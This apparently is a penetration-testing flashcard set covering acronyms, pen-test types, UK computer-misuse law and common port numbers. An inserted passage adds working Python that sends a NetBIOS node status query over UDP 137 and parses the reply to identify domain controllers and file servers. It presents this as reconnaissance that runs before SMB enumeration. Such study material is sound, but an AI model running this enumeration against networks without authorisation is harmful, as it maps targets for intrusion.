Flexible Single Master Operations
FSMO

Hypertext Markup Language
HTML

Hypertext Transfer Protocol
HTTP

Inter Asterisk eXchange
IAX

Internet Server Application Programming Interface
ISAPI

Network File System
NFS

Protected Extensible Authentication Protocol
PEAP

Public Key Infrastructure
PKI

Remote Authentication Dial In User Service
RADIUS

Rivest Shamir Adleman
RSA

Supervisory Control And Data Acquisition
SCADA

Session Initiation Protocol
SIP

Start Of Authority
SOA

Simple Object Access Protocol
SOAP

Structured Query Language
SQL

Secure Shell
SSH

Spanning Tree Protocol
STP

Temporal Key Integrity Protocol
TKIP

Universal Description Discovery and Integration
UDDI

User Datagram Protocol
UDP

Wired Equivalent Privacy
WEP

Wi-fi Protected Access
WPA

Web Services Description Language
WSDL

application pen testing
finds technical vulnerabilities

infrastructure pen testing
examines servers, firewalls and other hardware for security vulnerabilities

black box
no information is provided to the penetration tester

white box
full information is provided, for example network maps and access to development staff

Computer Misuse Act 1990
originally nothing to make DOS attacks illegal

Computer Misuse Act 1990
modifications in Police and Justice Act 2006 changed Section 3

Computer Misuse Act 1990
made DDOS via botnets illegal

Human Rights Act 1998
Article 8 – right to respect for private and family life, home and correspondence

Data Protection Act 1998
Section 55 – unlawful obtaining etc. of personal data

Police and Justice Act 2006
made amendments to the Computer Misuse Act 1990

Police and Justice Act 2006
made it illegal to perform DOS attacks

Police and Justice Act 2006
made it illegal to supply and own hacking tools

Police and Justice Act 2006
increased penalties of Computer Misuse Act 1990

risk of pen testing
degradation or loss of services

risk of pen testing
disclosure of sensitive information

TCP 548
Apple Filing Protocol (AFP) over TCP

TCP 179
Border Gateway Protocol (BGP)

UDP 67
Bootstrap Protocol (BOOTP) server; Dynamic Host Configuration Protocol (DHCP)

UDP 68
Bootstrap Protocol (BOOTP) client; Dynamic Host Configuration Protocol (DHCP)

TCP&UDP 19
Character Generator Protocol (CHARGEN)

TCP&UDP 13
Daytime Protocol

TCP&UDP 135
Distributed Computing Environment (DCE) endpoint resolution; Microsoft End Point Mapper (EPMAP); Distributed Component Object Model (DCOM)

TCP&UDP 546
Dynamic Host Configuration Protocol version 6 (DHCPv6) client

TCP&UDP 547
Dynamic Host Configuration Protocol version 6 (DHCPv6) server

TCP&UDP 9
Discard Protocol

TCP&UDP 53
Domain Name System (DNS)

TCP&UDP 7
Echo Protocol

TCP 79
Finger Protocol

TCP 21
File Transfer Protocol (FTP) control

TCP 20
File Transfer Protocol (FTP) data transfer

TCP&UDP 989
File Transfer Protocol over TLS/SSL (FTPS) data transfer

TCP&UDP 990
File Transfer Protocol over TLS/SSL (FTPS) control

TCP 70
Gopher Protocol

TCP 80
Hypertext Transfer Protocol (HTTP)

TCP 443
Hypertext Transfer Protocol over TLS/SSL (HTTPS)

TCP 113
Identification (ident) Protocol; Authentication Service

TCP 143
Internet Message Access Protocol (IMAP)

TCP&UDP 631
Internet Printing Protocol (IPP)

TCP&UDP 194
Internet Relay Chat (IRC)

TCP 6665-6669
Internet Relay Chat (IRC) (common alternatives)

UDP 500
Internet Security Association and Key Management Protocol (ISAKMP); Internet Key Exchange (IKE)

TCP 860
Internet Small Computer Systems Interface (iSCSI), IANA assignment; iSCSI targets commonly listen on TCP 3260

TCP 389
Lightweight Directory Access Protocol (LDAP)

TCP 636
Lightweight Directory Access Protocol over TLS/SSL (LDAPS)

TCP 515
Line Printer Daemon (LPD) protocol

UDP 138
Network Basic Input/Output System (NetBIOS) Datagram Service

TCP 139
Network Basic Input/Output System (NetBIOS) Session Service

TCP&UDP 137
Network Basic Input/Output System (NetBIOS) Name Service

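The UDP 137 entry above is the one a tester exercises most often on a Windows network: a NetBIOS node status (NBSTAT) query, as sent by nbtstat -A or nmblookup -A, returns the host's registered NetBIOS names (with their role suffixes) and its MAC address. The following is an added example, not code from the original page or from any tool it mentions; it builds the query, parses a reply, and runs offline against a constructed sample response. The host name FILESRV01, domain CORP and MAC address in the sample are assumed values.

```python
import socket
import struct

NBNS_PORT = 137      # UDP 137: NetBIOS Name Service (see the port list)
NBSTAT = 0x0021      # QTYPE for a node status request
WILDCARD = b"*" + b"\x00" * 15   # the '*' name, NUL-padded to 16 bytes

# Well-known 16th-byte suffixes of a NetBIOS name
SUFFIXES = {
    0x00: "Workstation/Domain",
    0x03: "Messenger",
    0x1B: "Domain Master Browser",
    0x1C: "Domain Controllers",
    0x1D: "Master Browser",
    0x1E: "Browser Elections",
    0x20: "File Server",
}


def first_level_encode(raw16: bytes) -> bytes:
    """RFC 1001 first-level encoding: each of the 16 bytes becomes two
    letters, high nibble + 'A' then low nibble + 'A' (so '*' -> 'CK')."""
    out = bytearray()
    for b in raw16:
        out.append((b >> 4) + 0x41)
        out.append((b & 0x0F) + 0x41)
    return bytes(out)


def build_node_status_query(txid: int = 0x1234) -> bytes:
    """NBSTAT request: 12-byte header, one question for the wildcard name."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    encoded = first_level_encode(WILDCARD)
    question = bytes([len(encoded)]) + encoded + b"\x00" + struct.pack(">HH", NBSTAT, 1)
    return header + question   # 50 bytes on the wire


def parse_node_status_response(data: bytes) -> dict:
    """Parse the answer RR: name table (18 bytes per entry) followed by the
    6-byte unit ID (MAC) and the adapter statistics block."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if not flags & 0x8000 or an < 1:
        raise ValueError("not an NBNS response with an answer")
    pos = 12
    name_len = data[pos]
    pos += 1 + name_len + 1                       # length byte, name, terminator
    rtype, _rclass, _ttl, _rdlen = struct.unpack(">HHIH", data[pos:pos + 10])
    pos += 10
    if rtype != NBSTAT:
        raise ValueError("unexpected RR type 0x%04x" % rtype)
    num_names = data[pos]
    pos += 1
    names = []
    for _ in range(num_names):
        entry = data[pos:pos + 18]
        pos += 18
        suffix = entry[15]
        nflags = struct.unpack(">H", entry[16:18])[0]
        names.append({
            "name": entry[:15].decode("latin-1").rstrip(),
            "suffix": suffix,
            "type": SUFFIXES.get(suffix, "unknown"),
            "group": bool(nflags & 0x8000),       # G bit: group (domain) name
            "active": bool(nflags & 0x0400),      # ACT bit
        })
    mac = ":".join("%02x" % b for b in data[pos:pos + 6])
    return {"txid": txid, "names": names, "mac": mac}


def node_status_query(host: str, timeout: float = 2.0) -> dict:
    """Live query against a host (network I/O; the offline demo below does not use it)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_query(), (host, NBNS_PORT))
        data, _ = s.recvfrom(4096)
    return parse_node_status_response(data)


def sample_response() -> bytes:
    """Constructed reply (assumed host FILESRV01 in domain CORP) for offline use."""
    header = struct.pack(">HHHHHH", 0x1234, 0x8400, 0, 1, 0, 0)
    rr_name = bytes([32]) + first_level_encode(WILDCARD) + b"\x00"
    entries = [(b"FILESRV01", 0x00, 0x0400), (b"FILESRV01", 0x20, 0x0400),
               (b"CORP", 0x00, 0x8400), (b"CORP", 0x1C, 0x8400)]
    rdata = bytes([len(entries)])
    for name, suffix, nflags in entries:
        rdata += name.ljust(15) + bytes([suffix]) + struct.pack(">H", nflags)
    rdata += bytes.fromhex("005056aabbcc") + b"\x00" * 40   # MAC + zeroed statistics
    return header + rr_name + struct.pack(">HHIH", NBSTAT, 1, 0, len(rdata)) + rdata


if __name__ == "__main__":
    for n in parse_node_status_response(sample_response())["names"]:
        print("%-15s <%02X> %-22s %s" % (n["name"], n["suffix"], n["type"],
                                         "GROUP" if n["group"] else "UNIQUE"))
```

A <1C> group entry identifies a domain controller and a <20> unique entry a host offering file sharing over SMB (TCP 445/139), so one unauthenticated UDP packet per host is enough to map roles before any SMB enumeration starts.
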
TCP 119
Network News Transfer Protocol (NNTP)

TCP&UDP 563
Network News Transfer Protocol over TLS/SSL (NNTPS)

UDP 123
Network Time Protocol (NTP)

TCP 110
Post Office Protocol version 3 (POP3)

TCP&UDP 995
Post Office Protocol version 3 over TLS/SSL (POP3S)

TCP&UDP 17
Quote of the Day (QOTD)

TCP&UDP 554
Real Time Streaming Protocol (RTSP)

UDP 520
Routing Information Protocol (RIP)

TCP 513
rlogin

UDP 513
rwho; ruptime

TCP&UDP 445
Microsoft Directory Services (DS) Active Directory (AD)

TCP 445
Microsoft Directory Services (DS) Server Message Block (SMB)

TCP 25
Simple Mail Transfer Protocol (SMTP)

TCP 465
URL rendezvous directory for SSM; authenticated Simple Mail Transfer Protocol over TLS/SSL (SMTPS)

TCP 22
Secure Shell (SSH)

TCP&UDP 111
Open Network Computing Remote Procedure Call (ONC RPC)

TCP 514
Remote Shell (RSH); rcp

TCP&UDP 49
Terminal Access Controller Access-Control System (TACACS) login host protocol; TACACS+

TCP 23
Telnet protocol

UDP 69
Trivial File Transfer Protocol (TFTP)

TCP 43
WHOIS protocol

TCP 1521
Oracle database default listener

TCP&UDP 1433
Microsoft SQL Server (MSSQL) database management system server

TCP&UDP 1434
Microsoft SQL Server (MSSQL) database management system monitor

TCP&UDP 177
X Display Manager Control Protocol (XDMCP)

TCP 3306
MySQL

TCP&UDP 33434
traceroute (classic UNIX traceroute sends UDP probes starting at port 33434, incrementing the port with each hop)

TCP 3128
Squid

TCP&UDP 1194
OpenVPN

TCP&UDP 1524
ingreslock (Ingres database lock service)

TCP 50000
IBM Db2

TCP 5432
PostgreSQL database system

TCP 512
Rexec

Data Encryption Standard
DES

Trivial File Transfer Protocol
TFTP

Local Security Authority
LSA

Security Accounts Manager
SAM

Pretty Good Privacy
PGP
